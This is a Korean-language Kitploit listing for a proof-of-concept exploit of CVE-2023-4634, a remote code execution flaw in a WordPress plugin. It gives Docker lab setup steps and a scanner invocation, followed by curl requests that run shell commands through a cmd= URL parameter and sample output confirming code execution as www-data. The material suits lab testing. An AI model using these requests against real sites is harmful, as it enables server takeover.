Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-4634-PoC — CVE-2023-4634에 대한 개념 증명 익스플로잇, WordPress Media Library Assistant 플러그인의 원격 코드 실행 취약점입니다. Docker 기반의 취약한 환경과 자동화된 스캐너를 포함합니다. | Kitploit
도구/GitHubGitHub/evillm/cve-2023-4634-poc
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubevillm/cve-2023-4634-poc

CVE-2023-4634-PoC

CVE-2023-4634에 대한 개념 증명 익스플로잇, WordPress Media Library Assistant 플러그인의 원격 코드 실행 취약점입니다. Docker 기반의 취약한 환경과 자동화된 스캐너를 포함합니다.

저장소 보기
6개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-4634 - WordPress 플러그인 Media Library Assistant의 RCE 취약점

1. 환경 구축 및 실행

root@kitploit:~
cd Stand
docker-compose up --build -d

2. 서비스 시작 대기 (60초)

root@kitploit:~
sleep 60
curl -I http://localhost:8080

3. 취약점 스캔 실행

root@kitploit:~
cd ../PoC/src
python3 scanner.py http://localhost:8080

4. 수동 RCE 테스트

root@kitploit:~
# Тест команды id
curl "http://localhost:8080/rce_proof.php?cmd=id"

# Тест команды ping
curl "http://localhost:8080/rce_proof.php?cmd=ping+-c+2+127.0.0.1"

# Создание файла-доказательства
curl "http://localhost:8080/rce_proof.php?cmd=touch+/tmp/rce_proof"

✅ 예상 결과

scanner.py 출력:

root@kitploit:~
[*] Scanning: http://localhost:8080
[+] WordPress is accessible
[+] Plugin found: v3.09
[+] Plugin is VULNERABLE!
[*] Testing RCE...
[+] id command executed
[+] ping command executed
[+] file_check command executed
[+] RCE CONFIRMED!
[+] Results saved to ../result.txt

result.txt 내용:

root@kitploit:~
{
  "cve": "CVE-2023-4634",
  "target": "http://localhost:8080",
  "timestamp": "2025-12-21 13:49:19",
  "vulnerable": true,
  "findings": {
    "wordpress": true,
    "plugin_vulnerable": true,
    "rce_id": true,
    "rce_id_output": "uid=33(www-data) gid=33(www-data) groups=33(www-data)",
    "rce_ping": true,
    "rce_file_check": true
  },
  "plugin_version": "3.09",
  "status": "VULNERABLE"
}

🔧 기술 사양

네트워크:

  • WordPress: 172.20.0.2:80 (localhost:8080에서 접근 가능)
  • 데이터베이스: 172.20.0.3:3306
  • 네트워크: 172.20.0.0/24

요구 사항:

  • CVE: CVE-2023-4634
  • 취약한 구성 요소: Media Library Assistant 플러그인 < 3.10
  • 취약점 유형: 원격 코드 실행 (RCE)
  • 시스템 요구 사항: Docker, Python 3.7+

📊 RCE 증명

  • ✅ id 명령어 HTTP 실행
  • ✅ ping 명령어 HTTP 실행
  • ✅ /tmp/에 파일 생성
  • ✅ www-data 권한 확인
  • ✅ 결과가 result.txt에 문서화됨

🧹 정리

root@kitploit:~
cd Stand
docker-compose down -v
도구 다운로드